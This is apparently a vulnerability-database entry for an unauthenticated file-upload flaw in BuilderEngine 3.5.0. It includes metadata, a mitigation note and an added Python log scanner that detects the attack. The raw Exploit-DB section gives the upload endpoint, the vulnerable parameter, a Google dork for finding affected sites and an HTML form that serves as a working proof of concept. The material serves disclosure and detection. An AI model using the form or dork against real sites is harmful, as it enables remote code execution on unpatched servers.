Vendor: BuilderEngine
By: metanubix
CVSS: 7.5 (HIGH)
Unauthenticated Unrestricted File Upload
CWE: 434
Product Name: BuilderEngine
Affected Version From: 3.5.0
Affected Version To: 3.5.0
Patch Exists: NO
Related CWE: N/A
CPE: a:builderengine:builderengine:3.5.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux 2.0 64 bit
2016

BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0

A vulnerability exists in BuilderEngine 3.5.0 which allows an unauthenticated attacker to upload arbitrary files to the server. This can be exploited by sending a POST request to /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ with a malicious file in the files[] parameter. The uploaded file can then be accessed via the /files/ directory.

Mitigation:

Validate and sanitize all file uploads on the server before accepting them. No patch is listed for version 3.5.0, and the upload handler above accepts requests without authentication.
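
Added example (not part of the Exploit-DB entry or of BuilderEngine): a check over web access logs for the request pattern described above, a POST to the upload handler followed by a request for a script under /files/. The log layout, the script-extension list and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths named in the advisory: the upload handler and the public upload directory.
UPLOAD_HANDLER = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
FILES_DIR = "/files/"
# Assumption: extensions this server hands to the PHP interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(/|$)", re.IGNORECASE)
# Assumption: logs are in the common/combined access-log layout.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def scan(lines):
    """Return (kind, client_ip, timestamp, path) findings in log order."""
    uploaders = set()  # clients already seen POSTing to the handler
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected layout
        ip, ts = m["ip"], m["ts"]
        # Drop the query string and decode %xx so encoded names still match.
        path = unquote(urlsplit(m["target"]).path)
        if m["method"] == "POST" and path.startswith(UPLOAD_HANDLER):
            uploaders.add(ip)
            findings.append(("upload-handler-post", ip, ts, path))
        elif path.startswith(FILES_DIR) and SCRIPT_EXT.search(path):
            if m["status"] == "404":
                continue  # file absent, nothing was served
            kind = "script-fetch-after-upload" if ip in uploaders else "script-under-files"
            findings.append((kind, ip, ts, path))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Sep/2016:10:01:02 +0000] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 312 "-" "curl/7.50"',
    '198.51.100.7 - - [18/Sep/2016:10:01:05 +0000] "GET /files/test.php HTTP/1.1" 200 14 "-" "curl/7.50"',
    '203.0.113.9 - - [18/Sep/2016:10:02:00 +0000] "GET /files/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Sep/2016:10:03:00 +0000] "GET /files/old.PHP?x=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

Any request that returns a script from /files/ is worth review on its own, since that directory is meant to hold uploaded content rather than application code.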

Exploit-DB raw data:

<!-- 
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"

1) Unauthenticated Unrestricted File Upload:

	POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/

	Vulnerable Parameter: files[]

	We can upload test.php and reach the file via the following link:
	/files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
	<input type="file" name="files[]" />
	<input type="submit" value="send" />
</form>
</body>
</html>